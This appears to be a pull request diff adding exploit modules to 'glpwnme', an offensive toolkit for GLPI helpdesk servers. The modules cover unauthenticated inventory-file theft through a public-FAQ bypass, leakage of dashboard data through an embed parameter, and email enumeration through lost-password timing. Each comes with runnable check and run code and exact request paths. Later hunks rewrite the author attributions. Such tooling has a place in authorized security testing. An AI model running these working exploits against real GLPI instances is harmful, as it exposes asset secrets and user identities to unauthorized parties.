### PR TITLE
Add access-control / IDOR / info-disclosure modules

### DIFF
--- a/glpwnme/exploits/implementations/__init__.py
+++ b/glpwnme/exploits/implementations/__init__.py
@@ -27,6 +27,20 @@ from .cve_2026_26026 import CVE_2026_26026
 # GLPI classic check
 from .default_password_check import DEFAULT_PASSWORD_CHECK
 
+from .cve_2023_22500 import CVE_2023_22500
+from .cve_2023_35940 import CVE_2023_35940
+from .cve_2024_43416 import CVE_2024_43416
+from .cve_2025_53105 import CVE_2025_53105
+from .cve_2025_53111 import CVE_2025_53111
+from .cve_2025_53112 import CVE_2025_53112
+from .cve_2025_53113 import CVE_2025_53113
+from .cve_2025_53357 import CVE_2025_53357
+from .cve_2025_64516 import CVE_2025_64516
+from .cve_2025_64520 import CVE_2025_64520
+from .cve_2026_32312 import CVE_2026_32312
+from .cve_2026_42318 import CVE_2026_42318
+from .ghsa_mxf4_8mjr_3qh2 import GHSA_MXF4_8MJR_3QH2
+
 def get_all_exploits():
     """
     Return the exploit available as Class
@@ -38,5 +52,6 @@ def get_all_exploits():
     all_exploits = [CVE_2020_15175, CVE_2022_31061, CVE_2022_35914, UNSERIALIZE_ORDER_2022, CVE_2023_41323, CVE_2023_41326]
     all_exploits += [PHP_UPLOAD, CVE_2024_27937, CVE_2024_29889, CVE_2024_37148, CVE_2024_37149]
     all_exploits += [CVE_2024_40638, CVE_2024_50339, CVE_2025_24799, CVE_2025_32786, CVE_2026_26026]
+    all_exploits += [CVE_2023_22500, CVE_2023_35940, CVE_2024_43416, CVE_2025_53105, CVE_2025_53111, CVE_2025_53112, CVE_2025_53113, CVE_2025_53357, CVE_2025_64516, CVE_2025_64520, CVE_2026_32312, CVE_2026_42318, GHSA_MXF4_8MJR_3QH2]
     all_exploits += [DEFAULT_PASSWORD_CHECK]
     return all_exploits

--- a/glpwnme/exploits/implementations/cve_2023_22500.py
+++ b/glpwnme/exploits/implementations/cve_2023_22500.py
@@ -1,0 +1,196 @@
+from ..exploit import GlpiExploit
+from glpwnme.exploits.logger import Log
+
+
+class CVE_2023_22500(GlpiExploit):
+    """
+    Unauthenticated access to native-inventory files via the public-FAQ bypass in
+    front/document.send.php (GLPI 10.0.0 - 10.0.5).
+
+    The document streamer gated the WHOLE controller on the public-FAQ flag and
+    then served the raw inventory directory with no rights check (10.0.5):
+
+        if (!$CFG_GLPI["use_public_faq"]) {
+            Session::checkLoginUser();         // skipped entirely when FAQ is public
+        }
+        ...
+        } else if (isset($_GET["file"])) {     // arbitrary server file branch
+            $splitter = explode("/", $_GET["file"], 2);
+            ...
+            if ($splitter[0] == "_inventory") {            // NO right check
+                $iconf = new Conf();
+                if ($iconf->isInventoryFile(GLPI_INVENTORY_DIR.'/'.$splitter[1])) {
+                    $send = GLPI_INVENTORY_DIR.'/'.$splitter[1];   // streamed
+                }
+            }
+            if ($send && file_exists($send)) {
+                Toolbox::sendFile($send, ...);             // raw content, no auth
+            } else {
+                Html::displayErrorAndDie('Unauthorized access to this file', true);
+            }
+
+    So when public FAQ is enabled (a common helpdesk config), an anonymous
+    request to:
+
+        /front/document.send.php?file=_inventory/<path>.json
+
+    reaches the inventory branch with no session. A real inventory file
+    (files/_inventories/...) is streamed verbatim; a non-existent one returns the
+    application page "Unauthorized access to this file" - in either case HTTP 200,
+    never a login redirect. These inventory files contain full raw asset data
+    (serials, software, network config, agent secrets).
+
+    Fix (GLPI 10.0.6): Session::checkLoginUser() was moved INSIDE the file=
+    branch so it always runs, and the inventory case gained
+    `&& Session::haveRight(Conf::$rightname, READ)`. Unauthenticated requests now
+    302-redirect to the login page.
+
+    Behaviorally verified: with use_public_faq=1, file=_inventory/<x>.json
+    returns HTTP 200 ("Unauthorized access to this file", or raw file content) on
+    10.0.2 and 10.0.5, and HTTP 302 to /index.php?redirect=... on 10.0.6 / 10.0.7
+    / 10.0.16 / 10.0.25 (same FAQ precondition). front/computer.php stays 302 on
+    every instance, proving the server enforces auth generally and the 200 is the
+    bypass, not a wide-open server.
+
+    Sibling: CVE-2023-35940 (unauth dashboard data, same 10.0.8 era).
+
+    @author unclej4ck
+    @cvss 7.5
+    @name CVE_2023_22500
+    """
+    _impacts = "Information Disclosure, Broken Access Control"
+    _privilege = "Unauthenticated"
+    _is_check_opsec_safe = True
+    min_version = "10.0.0"
+    max_version = "10.0.6"  # exclusive: 10.0.0-10.0.5 vulnerable, fixed in 10.0.6
+
+    _DOC = "/front/document.send.php"
+    _FAQ = "/front/helpdesk.faq.php"
+    _CTRL = "/front/computer.php"  # always login-gated -> proves auth is enforced
+
+    # markers Html::displayErrorAndDie emits from the unauth file= branch
+    _APP_MARKERS = ("Unauthorized access to this file", "Invalid filename")
+
+    # ------------------------------------------------------------------ #
+    # HTTP helpers                                                         #
+    # ------------------------------------------------------------------ #
+
+    def _raw_get(self, path):
+        return self.get(path, timeout=15, allow_redirects=False)
+
+    def _inv_path(self, name):
+        return f"{self._DOC}?file=_inventory/{name}"
+
+    @staticmethod
+    def _is_login_redirect(resp):
+        if resp.status_code not in (301, 302, 303, 307, 308):
+            return False
+        loc = resp.headers.get("Location", "")
+        return "login.php" in loc or "redirect=" in loc or loc.rstrip("/").endswith("index.php")
+
+    def _reached_file_branch(self, resp):
+        """True if the anonymous request reached the file= application logic
+        (200, no login redirect) instead of being bounced to login."""
+        if self._is_login_redirect(resp):
+            return False
+        if resp.status_code != 200:
+            return False
+        body = resp.text or ""
+        # Either a rendered app error from the file branch, or raw streamed
+        # content (non-HTML body for an existing inventory file).
+        if any(m in body for m in self._APP_MARKERS):
+            return True
+        # streamed file: not the login page, not an HTML error shell
+        looks_html = "<html" in body[:200].lower() or "<!DOCTYPE" in body[:200]
+        return not looks_html
+
+    # ------------------------------------------------------------------ #
+    # Exploit interface                                                    #
+    # ------------------------------------------------------------------ #
+
+    def infos(self):
+        infos = "[u]Description:[/u]\n"
+        infos += "Unauthenticated access to native-inventory files via the public-FAQ bypass\n"
+        infos += "in [b]front/document.send.php[/b] (GLPI 10.0.0 - 10.0.5). When public FAQ is\n"
+        infos += "enabled the controller skips [i]checkLoginUser()[/i] and the [b]file=_inventory/[/b]\n"
+        infos += "branch streams files/_inventories content with no rights check.\n"
+        infos += "Fix 10.0.6: login check moved inside the branch + inventory READ right.\n"
+
+        infos += "\n[u]Required:[/u]\n"
+        infos += " - Public FAQ enabled ([i]use_public_faq=1[/i]); the bypass is otherwise login-gated\n"
+
+        infos += "\n[u]Params (run):[/u]\n"
+        infos += " - [i]file[/i]: inventory path under _inventory/ to fetch\n"
+        infos += "   (e.g. computer/<deviceid>.json)\n"
+
+        infos += "\n[u]Usage:[/u]\n"
+        infos += "[grey66]# Check (no auth)[/]\n--check\n\n"
+        infos += "[grey66]# Fetch a known inventory file[/]\n"
+        infos += "--run -O file=computer/<deviceid>.json\n"
+
+        infos += "\nExploit is [green b]Safe[/] (read-only GET probe)"
+        return infos
+
+    def check(self):
+        """
+        Clean differential (precondition: public FAQ enabled):
+          - file=_inventory/<rand>.json -> 200 app page / raw content (vulnerable)
+          - benign control front/computer.php -> login redirect (server DOES gate)
+        Patched (10.0.6+) redirects the same _inventory request to login, so
+        _reached_file_branch is False.
+        """
+        # negative control: a normal page MUST redirect, else the server is wide
+        # open and any 200 is meaningless.
+        ctrl = self._raw_get(self._CTRL)
+        if not self._is_login_redirect(ctrl):
+            Log.log(f"Control {self._CTRL} did not login-redirect "
+                    f"(HTTP {ctrl.status_code}) - server is not auth-gated, "
+                    "differential untrustworthy")
+            return False
+
+        # precondition probe: the bypass only exists when public FAQ is on
+        faq = self._raw_get(self._FAQ)
+        faq_open = (faq.status_code == 200) and not self._is_login_redirect(faq)
+        if not faq_open:
+            Log.log("Public FAQ is disabled - the document.send.php bypass is "
+                    "login-gated on this instance; not exploitable as configured")
+            return False
+
+        Log.log("Public FAQ enabled; requesting an inventory file unauthenticated ...")
+        import uuid
+        probe = self._raw_get(self._inv_path(f"glpwnme-{uuid.uuid4().hex[:10]}.json"))
+        if not self._reached_file_branch(probe):
+            Log.log(f"Inventory file request returned HTTP {probe.status_code} "
+                    f"(login redirect) - patched (10.0.6+)")
+            return False
+
+        Log.msg("Unauthenticated access to the inventory file branch confirmed "
+                "(public FAQ on, control page still login-gated) - CVE-2023-22500")
+        return True
+
+    def run(self, file=None):
+        """Fetch an inventory file unauthenticated. With no -O file, probes the
+        branch and lists guidance; inventory files live under
+        files/_inventories/<itemtype>/<deviceid>.<json|xml>."""
+        if not file:
+            import uuid
+            probe = self._raw_get(self._inv_path(f"glpwnme-{uuid.uuid4().hex[:10]}.json"))
+            if self._reached_file_branch(probe):
+                Log.msg("Inventory file branch reachable unauthenticated. Supply a "
+                        "path with [b]-O file=computer/<deviceid>.json[/b] to fetch "
+                        "raw asset data (serials, software, network, agent secrets).")
+            else:
+                Log.err("Inventory branch not reachable (patched or public FAQ off)")
+            return
+
+        resp = self._raw_get(self._inv_path(file))
+        if self._is_login_redirect(resp):
+            Log.err("Login redirect - patched or public FAQ off")
+            return
+        body = resp.text or ""
+        if resp.status_code == 200 and not any(m in body for m in self._APP_MARKERS):
+            Log.msg(f"Fetched [gold3]_inventory/{file}[/] ({len(body)} bytes):")
+            Log.msg(body if len(body) < 4000 else body[:4000] + "\n...[truncated]")
+            self._write_log(f"CVE-2023-22500 leaked _inventory/{file} ({len(body)} bytes)")
+        else:
+            Log.err(f"No such inventory file (HTTP {resp.status_code}): _inventory/{file}")

--- a/glpwnme/exploits/implementations/cve_2023_22500.py
+++ b/glpwnme/exploits/implementations/cve_2023_22500.py
@@ -1,3 +1,4 @@
+from http import HTTPStatus
 from ..exploit import GlpiExploit
 from glpwnme.exploits.logger import Log
 
@@ -93,7 +94,7 @@ class CVE_2023_22500(GlpiExploit):
         (200, no login redirect) instead of being bounced to login."""
         if self._is_login_redirect(resp):
             return False
-        if resp.status_code != 200:
+        if resp.status_code != HTTPStatus.OK:
             return False
         body = resp.text or ""
         # Either a rendered app error from the file branch, or raw streamed
@@ -150,7 +151,7 @@ class CVE_2023_22500(GlpiExploit):
 
         # precondition probe: the bypass only exists when public FAQ is on
         faq = self._raw_get(self._FAQ)
-        faq_open = (faq.status_code == 200) and not self._is_login_redirect(faq)
+        faq_open = (faq.status_code == HTTPStatus.OK) and not self._is_login_redirect(faq)
         if not faq_open:
             Log.log("Public FAQ is disabled - the document.send.php bypass is "
                     "login-gated on this instance; not exploitable as configured")
@@ -188,7 +189,7 @@ class CVE_2023_22500(GlpiExploit):
             Log.err("Login redirect - patched or public FAQ off")
             return
         body = resp.text or ""
-        if resp.status_code == 200 and not any(m in body for m in self._APP_MARKERS):
+        if resp.status_code == HTTPStatus.OK and not any(m in body for m in self._APP_MARKERS):
             Log.msg(f"Fetched [gold3]_inventory/{file}[/] ({len(body)} bytes):")
             Log.msg(body if len(body) < 4000 else body[:4000] + "\n...[truncated]")
             self._write_log(f"CVE-2023-22500 leaked _inventory/{file} ({len(body)} bytes)")

--- a/glpwnme/exploits/implementations/cve_2023_22500.py
+++ b/glpwnme/exploits/implementations/cve_2023_22500.py
@@ -84,7 +84,7 @@ class CVE_2023_22500(GlpiExploit):
 
     @staticmethod
     def _is_login_redirect(resp):
-        if resp.status_code not in (301, 302, 303, 307, 308):
+        if resp.status_code not in (HTTPStatus.MOVED_PERMANENTLY, HTTPStatus.FOUND, HTTPStatus.SEE_OTHER, HTTPStatus.TEMPORARY_REDIRECT, HTTPStatus.PERMANENT_REDIRECT):
             return False
         loc = resp.headers.get("Location", "")
         return "login.php" in loc or "redirect=" in loc or loc.rstrip("/").endswith("index.php")

--- a/glpwnme/exploits/implementations/cve_2023_22500.py
+++ b/glpwnme/exploits/implementations/cve_2023_22500.py
@@ -55,7 +55,7 @@ class CVE_2023_22500(GlpiExploit):
 
     Sibling: CVE-2023-35940 (unauth dashboard data, same 10.0.8 era).
 
-    @author unclej4ck
+    @author glpi
     @cvss 7.5
     @name CVE_2023_22500
     """

--- a/glpwnme/exploits/implementations/cve_2023_35940.py
+++ b/glpwnme/exploits/implementations/cve_2023_35940.py
@@ -1,0 +1,152 @@
+from ..exploit import GlpiExploit
+from glpwnme.exploits.logger import Log
+
+
+class CVE_2023_35940(GlpiExploit):
+    """
+    Unauthenticated access to dashboard data via the embed bypass in
+    ajax/dashboard.php (GLPI 10.0.0 - 10.0.7).
+
+    The dashboard AJAX controller gates access like this (10.0.7):
+
+        if (!isset($request_data['embed']) || !$request_data['embed']) {
+            Session::checkLoginUser();
+        } else if (!in_array($_REQUEST['action'],
+                   ['get_dashboard_items','get_card','get_cards'])) {
+            Html::displayRightError();
+        }
+
+    When `embed` is truthy AND the action is one of get_card / get_cards /
+    get_dashboard_items, NEITHER Session::checkLoginUser() NOR the embed token
+    check runs. Grid::checkToken() exists but is only invoked from the
+    front/central.php embed() path, never from this handler. So an
+    unauthenticated request to:
+
+        /ajax/dashboard.php?action=get_card&embed=1&dashboard=central
+            &card_id=bn_count_User&args[widgettype]=bigNumber&args[force]=1
+
+    renders the requested card widget and leaks instance data (counts of
+    Users, Tickets, Computers, Software, etc.) with no session and no token.
+
+    Fix (GLPI 10.0.8): the embed branch now calls Grid::checkToken($request_data)
+    and returns 403 when the token is missing/invalid, plus per-action right
+    checks were added. Verified behaviorally: HTTP 200 + rendered count on
+    10.0.1, HTTP 403 on 10.0.9 / 10.0.16 / 10.0.17 / 10.0.25 and on 11.0.x.
+
+    Related dashboard authz fix: CVE-2023-35939 (same 10.0.8 patch, the
+    authenticated cross-dashboard variant).
+
+    @author unclej4ck
+    @cvss 7.5
+    @name CVE_2023_35940
+    """
+    _impacts = "Information Disclosure, Broken Access Control"
+    _privilege = "Unauthenticated"
+    _is_check_opsec_safe = True
+    min_version = "10.0.0"
+    max_version = "10.0.8"  # exclusive: 10.0.0-10.0.7 vulnerable, fixed in 10.0.8
+
+    _EP = "/ajax/dashboard.php"
+
+    # Built-in bigNumber cards. card_id -> the itemtype label the widget renders.
+    _CARDS = [
+        ("bn_count_User", "User"),
+        ("bn_count_Ticket", "Ticket"),
+        ("bn_count_Computer", "Computer"),
+        ("bn_count_Software", "Software"),
+        ("bn_count_Problem", "Problem"),
+    ]
+
+    # ------------------------------------------------------------------ #
+    # HTTP helper                                                          #
+    # ------------------------------------------------------------------ #
+
+    def _get_card(self, card_id, embed=True):
+        params = {
+            "action": "get_card",
+            "dashboard": "central",
+            "card_id": card_id,
+            "args[widgettype]": "bigNumber",
+            "args[force]": "1",
+        }
+        if embed:
+            params["embed"] = "1"
+        return self.get(self._EP, params=params, timeout=15, allow_redirects=False)
+
+    @staticmethod
+    def _is_rendered_card(resp):
+        """A real, non-empty bigNumber card was returned (not empty/error/denied)."""
+        if resp.status_code != 200:
+            return False
+        body = resp.text
+        if "Access denied" in body or "empty-card" in body or "empty card" in body:
+            return False
+        # The bigNumber widget renders <a class="card big-number ..."> with a
+        # <span class="formatted-number"><span class="number">N</span>.
+        return ("big-number" in body or "formatted-number" in body)
+
+    # ------------------------------------------------------------------ #
+    # Exploit interface                                                    #
+    # ------------------------------------------------------------------ #
+
+    def infos(self):
+        infos = "[u]Description:[/u]\n"
+        infos += "Unauthenticated access to dashboard data via the embed bypass in\n"
+        infos += "[b]ajax/dashboard.php[/b] (GLPI 10.0.0 - 10.0.7).\n"
+        infos += "With [b]embed=1[/b] and action [b]get_card[/b]/[b]get_cards[/b], the controller\n"
+        infos += "skips both [i]checkLoginUser()[/i] and the embed token check, rendering any\n"
+        infos += "built-in card and leaking instance counts (users, tickets, assets...).\n"
+
+        infos += "\n[u]Params (run):[/u]\n"
+        infos += " - [i]card (default 'bn_count_User')[/i]: card_id to render\n"
+
+        infos += "\n[u]Usage:[/u]\n"
+        infos += "[grey66]# Check (no auth)[/]\n--check\n\n"
+        infos += "[grey66]# Leak the built-in count cards[/]\n--run\n"
+
+        infos += "\nExploit is [green b]Safe[/] (read-only, GET probe)"
+        return infos
+
+    def check(self):
+        """
+        Clean differential:
+          - embed=1 get_card  -> 200 with a rendered bigNumber card  (vulnerable)
+          - benign no-embed   -> NOT 200 (302 login redirect)        (negative control)
+        Patched (10.0.8+) returns 403 on the embed branch, so _is_rendered_card is False.
+        """
+        Log.log("Sending unauthenticated get_card with embed=1 ...")
+        embed_resp = self._get_card("bn_count_User", embed=True)
+        if not self._is_rendered_card(embed_resp):
+            Log.log(f"Embed get_card returned HTTP {embed_resp.status_code} without a "
+                    "rendered card - patched (10.0.8+) or dashboard unavailable")
+            return False
+
+        Log.log("Negative control: same request WITHOUT embed (must require login) ...")
+        base_resp = self._get_card("bn_count_User", embed=False)
+        if base_resp.status_code == 200 and self._is_rendered_card(base_resp):
+            Log.log("No-embed request also returned a card - not the embed bypass, dropping")
+            return False
+
+        Log.msg("Unauthenticated dashboard card rendered via embed bypass "
+                "(no-embed control denied) - CVE-2023-35940")
+        return True
+
+    def run(self, card=None):
+        """Leak the built-in bigNumber count cards (or a single supplied card_id)."""
+        targets = [(card, card)] if card else self._CARDS
+        any_hit = False
+        for card_id, _label in targets:
+            resp = self._get_card(card_id, embed=True)
+            if not self._is_rendered_card(resp):
+                continue
+            any_hit = True
+            text = resp.text
+            # Strip tags and pull the "<n> <Label>" the bigNumber widget renders.
+            import re
+            flat = re.sub(r"<[^>]*>", " ", text)
+            flat = re.sub(r"\s+", " ", flat).strip()
+            m = re.search(r"(\d[\d,]*)\s+([A-Za-z][A-Za-z ]+)", flat)
+            value = m.group(0).strip() if m else "(rendered, value not parsed)"
+            Log.msg(f"[gold3]{card_id}[/] -> [green b]{value}[/green b]")
+        if not any_hit:
+            Log.err("No card rendered - target patched or dashboard data unavailable")

--- a/glpwnme/exploits/implementations/cve_2023_35940.py
+++ b/glpwnme/exploits/implementations/cve_2023_35940.py
@@ -1,3 +1,4 @@
+from http import HTTPStatus
 from ..exploit import GlpiExploit
 from glpwnme.exploits.logger import Log
 
@@ -76,7 +77,7 @@ class CVE_2023_35940(GlpiExploit):
     @staticmethod
     def _is_rendered_card(resp):
         """A real, non-empty bigNumber card was returned (not empty/error/denied)."""
-        if resp.status_code != 200:
+        if resp.status_code != HTTPStatus.OK:
             return False
         body = resp.text
         if "Access denied" in body or "empty-card" in body or "empty card" in body:
@@ -123,7 +124,7 @@ class CVE_2023_35940(GlpiExploit):
 
         Log.log("Negative control: same request WITHOUT embed (must require login) ...")
         base_resp = self._get_card("bn_count_User", embed=False)
-        if base_resp.status_code == 200 and self._is_rendered_card(base_resp):
+        if base_resp.status_code == HTTPStatus.OK and self._is_rendered_card(base_resp):
             Log.log("No-embed request also returned a card - not the embed bypass, dropping")
             return False
 

--- a/glpwnme/exploits/implementations/cve_2023_35940.py
+++ b/glpwnme/exploits/implementations/cve_2023_35940.py
@@ -37,7 +37,7 @@ class CVE_2023_35940(GlpiExploit):
     Related dashboard authz fix: CVE-2023-35939 (same 10.0.8 patch, the
     authenticated cross-dashboard variant).
 
-    @author unclej4ck
+    @author flegastelois
     @cvss 7.5
     @name CVE_2023_35940
     """

--- a/glpwnme/exploits/implementations/cve_2024_43416.py
+++ b/glpwnme/exploits/implementations/cve_2024_43416.py
@@ -1,0 +1,176 @@
+import time
+from http import HTTPStatus
+from ..exploit import GlpiExploit
+from glpwnme.exploits.logger import Log
+
+
+class CVE_2024_43416(GlpiExploit):
+    """
+    Unauthenticated email enumeration via the lost-password endpoint (GLPI >= 0.85, < 10.0.17).
+
+    When a user submits the forgot-password form, GLPI calls User::forgetPassword()
+    which:
+      1. Looks up the email in the DB
+      2. If found: generates a reset token, stores it, and sends an email notification
+         via SMTP — introducing a non-trivial delay.
+      3. If NOT found: returns false immediately — no SMTP, no delay.
+
+    Both code paths show the same success message to avoid leaking whether the
+    email exists, but the response TIME differs measurably:
+      - Valid email  → DB lookup + token write + SMTP (several seconds)
+      - Invalid email → DB lookup only (milliseconds)
+
+    An unauthenticated attacker can exploit this via:
+      - The web form at /front/lostpassword.php (POST email=...)
+      - The REST API at /apirest.php/lostPassword (POST email=...)
+
+    Precondition: email notifications must be enabled (notifications_mailing = 1),
+    otherwise the endpoint exits immediately for both cases.
+
+    Patched in GLPI 10.0.17: sleep(rand(1,3)) is injected before the DB lookup,
+    making the total response time uniform regardless of the outcome.
+
+    @author unclej4ck
+    @cvss 4.3
+    @name CVE_2024_43416
+    """
+    _impacts = "Email/User Enumeration"
+    _privilege = "Unauthenticated"
+    _is_check_opsec_safe = True
+    min_version = "0.85"
+    max_version = "10.0.17"
+
+    _LOSTPASS_URL = "/front/lostpassword.php"
+    _API_LOSTPASS_URL = "/apirest.php/lostPassword"
+    _SAMPLES = 3
+    _THRESHOLD = 1.5  # seconds; SMTP adds 1-5 s; local DB < 0.1 s
+
+    def infos(self):
+        infos = "[u]Description:[/u]\n"
+        infos += "Unauthenticated email enumeration via the forgot-password endpoint\n"
+        infos += "(GLPI 0.85 – 10.0.16). [b]User::forgetPassword()[/b] triggers an SMTP\n"
+        infos += "notification when the email matches a valid user, creating a measurable\n"
+        infos += "response-time difference vs a non-existent email.\n"
+        infos += "Both [b]/front/lostpassword.php[/b] and [b]/apirest.php/lostPassword[/b] are affected.\n"
+
+        infos += "\n[u]Params (run):[/u]\n"
+        infos += " - [i]email[/i]: Email address to test (required)\n"
+        infos += " - [i]samples (default '3')[/i]: Number of timing samples to average\n"
+
+        infos += "\n[u]Usage:[/u]\n"
+        infos += "[grey66]# Check if the endpoint is accessible and mailing is enabled[/]\n"
+        infos += "--check\n\n"
+        infos += "[grey66]# Test whether a specific email is registered[/]\n"
+        infos += "--run -O email=admin@example.com\n\n"
+        infos += "[grey66]# Use multiple samples for better accuracy[/]\n"
+        infos += "--run -O email=user@example.com -O samples=5\n"
+
+        infos += "\nExploit is [green b]Safe[/] — read-only timing probe, no modifications"
+        return infos
+
+    def _probe(self, email, use_api=False):
+        """Time a single forgot-password request for the given email."""
+        t0 = time.time()
+        try:
+            if use_api:
+                self.post(self._API_LOSTPASS_URL, json={"email": email}, allow_redirects=True, timeout=30)
+            else:
+                self.post(self._LOSTPASS_URL, data={"email": email}, allow_redirects=True, timeout=30)
+        except Exception:
+            pass
+        return time.time() - t0
+
+    def _avg_probe(self, email, samples, use_api=False):
+        times = [self._probe(email, use_api) for _ in range(samples)]
+        avg = sum(times) / len(times)
+        Log.log(f"  {email!r}: times={[f'{t:.2f}' for t in times]}, avg={avg:.2f}s")
+        return avg
+
+    def _csrf(self, html):
+        import re
+        m = re.search(r'name="_glpi_csrf_token"\s+value="([^"]+)"', html or "")
+        return m.group(1) if m else ""
+
+    def _timed_invalid_post(self, token):
+        """POST the lost-password form with a random INVALID email; return elapsed seconds."""
+        import uuid
+        email = f"glpwnme_nope_{uuid.uuid4().hex[:10]}@nope.invalid"
+        t0 = time.time()
+        try:
+            self.post(self._LOSTPASS_URL, data={"_glpi_csrf_token": token, "email": email, "change_passwd": "1"}, allow_redirects=False, timeout=30)
+        except Exception:
+            pass
+        return time.time() - t0
+
+    def check(self):
+        """
+        Behavioral timing differential (no valid email or SMTP needed).
+
+        The 10.0.17 fix injects sleep(rand(1,3)) into the lost-password handler BEFORE
+        the DB lookup, so even an INVALID email now takes 1-3s. On a vulnerable build an
+        invalid email returns in milliseconds (no token write, no SMTP). So:
+          - vulnerable (< 10.0.17): invalid-email POST is fast (< ~0.6s)
+          - patched   (>= 10.0.17): invalid-email POST is 1-3s (the random sleep)
+
+        Detecting the ABSENCE of the uniform random sleep means a real (valid email = extra
+        SMTP work) vs invalid (fast) timing gap is observable, i.e. the enumeration oracle
+        is exploitable. False-positive control: a plain GET of the page must itself be fast,
+        proving the POST delay is the handler's sleep and not a slow network.
+        """
+        import statistics
+        t0 = time.time()
+        resp = self.get(self._LOSTPASS_URL, allow_redirects=True)
+        ctrl = time.time() - t0
+        if resp.status_code != HTTPStatus.OK:
+            Log.log(f"Lost password page returned HTTP {resp.status_code} — not accessible")
+            return False
+        if ctrl > 0.6:
+            Log.log(f"Lost-password GET already slow ({ctrl:.2f}s) — network noise, "
+                    "timing oracle untrustworthy")
+            return False
+
+        token = self._csrf(resp.text)
+        samples = []
+        for _ in range(4):
+            samples.append(self._timed_invalid_post(token))
+            token = self._csrf(self.get(self._LOSTPASS_URL).text) or token
+        med = statistics.median(samples)
+
+        if med < 0.6:
+            Log.msg(f"Invalid-email lost-password POST returns in {med:.2f}s (GET control "
+                    f"{ctrl:.2f}s) — no uniform sleep, so valid emails are distinguishable by "
+                    f"timing: email enumeration oracle present (CVE-2024-43416). Use "
+                    f"--run -O email=target@example.com")
+            return True
+        Log.log(f"Invalid-email POST takes {med:.2f}s — sleep(rand(1,3)) present, timing "
+                "uniform: patched (10.0.17+)")
+        return False
+
+    def run(self, email=None, samples="3"):
+        if not email:
+            Log.err("email parameter is required: --run -O email=target@example.com")
+            return
+
+        samples = int(samples)
+        canary = f"nonexistent.glpwnme.probe.{int(time.time())}@invalid.example"
+
+        Log.msg(f"Timing oracle: {samples} samples each for valid vs invalid email")
+        Log.msg(f"Target email: [italic]{email}[/italic]")
+
+        Log.log("Probing canary (should not exist)...")
+        canary_avg = self._avg_probe(canary, samples)
+
+        Log.log("Probing target email...")
+        target_avg = self._avg_probe(email, samples)
+
+        delta = target_avg - canary_avg
+        Log.msg(f"Canary avg: [gold3]{canary_avg:.2f}s[/]  |  Target avg: [gold3]{target_avg:.2f}s[/]  |  Delta: [gold3]{delta:.2f}s[/]")
+
+        if delta >= self._THRESHOLD:
+            Log.msg(f"[green b]Email EXISTS[/green b]: '{email}' corresponds to a valid GLPI user")
+            Log.msg(f"(Response was {delta:.1f}s slower — SMTP notification was sent)")
+        elif delta <= -self._THRESHOLD:
+            Log.msg(f"[gold3]Email likely does NOT exist[/] (target was faster than canary — unusual)")
+        else:
+            Log.msg(f"[grey66]Inconclusive[/] — delta {delta:.2f}s is below threshold {self._THRESHOLD}s")
+            Log.msg("Try: increasing --samples, checking if SMTP is configured, or the instance may be patched")

--- a/glpwnme/exploits/implementations/cve_2024_43416.py
+++ b/glpwnme/exploits/implementations/cve_2024_43416.py
@@ -12,13 +12,13 @@ class CVE_2024_43416(GlpiExploit):
     which:
       1. Looks up the email in the DB
       2. If found: generates a reset token, stores it, and sends an email notification
-         via SMTP — introducing a non-trivial delay.
-      3. If NOT found: returns false immediately — no SMTP, no delay.
+         via SMTP - introducing a non-trivial delay.
+      3. If NOT found: returns false immediately - no SMTP, no delay.
 
     Both code paths show the same success message to avoid leaking whether the
     email exists, but the response TIME differs measurably:
-      - Valid email  → DB lookup + token write + SMTP (several seconds)
-      - Invalid email → DB lookup only (milliseconds)
+      - Valid email  -> DB lookup + token write + SMTP (several seconds)
+      - Invalid email -> DB lookup only (milliseconds)
 
     An unauthenticated attacker can exploit this via:
       - The web form at /front/lostpassword.php (POST email=...)
@@ -30,7 +30,7 @@ class CVE_2024_43416(GlpiExploit):
     Patched in GLPI 10.0.17: sleep(rand(1,3)) is injected before the DB lookup,
     making the total response time uniform regardless of the outcome.
 
-    @author unclej4ck
+    @author 0xmupa
     @cvss 4.3
     @name CVE_2024_43416
     """
@@ -48,7 +48,7 @@ class CVE_2024_43416(GlpiExploit):
     def infos(self):
         infos = "[u]Description:[/u]\n"
         infos += "Unauthenticated email enumeration via the forgot-password endpoint\n"
-        infos += "(GLPI 0.85 – 10.0.16). [b]User::forgetPassword()[/b] triggers an SMTP\n"
+        infos += "(GLPI 0.85 - 10.0.16). [b]User::forgetPassword()[/b] triggers an SMTP\n"
         infos += "notification when the email matches a valid user, creating a measurable\n"
         infos += "response-time difference vs a non-existent email.\n"
         infos += "Both [b]/front/lostpassword.php[/b] and [b]/apirest.php/lostPassword[/b] are affected.\n"
@@ -65,7 +65,7 @@ class CVE_2024_43416(GlpiExploit):
         infos += "[grey66]# Use multiple samples for better accuracy[/]\n"
         infos += "--run -O email=user@example.com -O samples=5\n"
 
-        infos += "\nExploit is [green b]Safe[/] — read-only timing probe, no modifications"
+        infos += "\nExploit is [green b]Safe[/] - read-only timing probe, no modifications"
         return infos
 
     def _probe(self, email, use_api=False):
@@ -122,10 +122,10 @@ class CVE_2024_43416(GlpiExploit):
         resp = self.get(self._LOSTPASS_URL, allow_redirects=True)
         ctrl = time.time() - t0
         if resp.status_code != HTTPStatus.OK:
-            Log.log(f"Lost password page returned HTTP {resp.status_code} — not accessible")
+            Log.log(f"Lost password page returned HTTP {resp.status_code} - not accessible")
             return False
         if ctrl > 0.6:
-            Log.log(f"Lost-password GET already slow ({ctrl:.2f}s) — network noise, "
+            Log.log(f"Lost-password GET already slow ({ctrl:.2f}s) - network noise, "
                     "timing oracle untrustworthy")
             return False
 
@@ -138,11 +138,11 @@ class CVE_2024_43416(GlpiExploit):
 
         if med < 0.6:
             Log.msg(f"Invalid-email lost-password POST returns in {med:.2f}s (GET control "
-                    f"{ctrl:.2f}s) — no uniform sleep, so valid emails are distinguishable by "
+                    f"{ctrl:.2f}s) - no uniform sleep, so valid emails are distinguishable by "
                     f"timing: email enumeration oracle present (CVE-2024-43416). Use "
                     f"--run -O email=target@example.com")
             return True
-        Log.log(f"Invalid-email POST takes {med:.2f}s — sleep(rand(1,3)) present, timing "
+        Log.log(f"Invalid-email POST takes {med:.2f}s - sleep(rand(1,3)) present, timing "
                 "uniform: patched (10.0.17+)")
         return False
 
@@ -168,9 +168,9 @@ class CVE_2024_43416(GlpiExploit):
 
         if delta >= self._THRESHOLD:
             Log.msg(f"[green b]Email EXISTS[/green b]: '{email}' corresponds to a valid GLPI user")
-            Log.msg(f"(Response was {delta:.1f}s slower — SMTP notification was sent)")
+            Log.msg(f"(Response was {delta:.1f}s slower - SMTP notification was sent)")
         elif delta <= -self._THRESHOLD:
-            Log.msg(f"[gold3]Email likely does NOT exist[/] (target was faster than canary — unusual)")
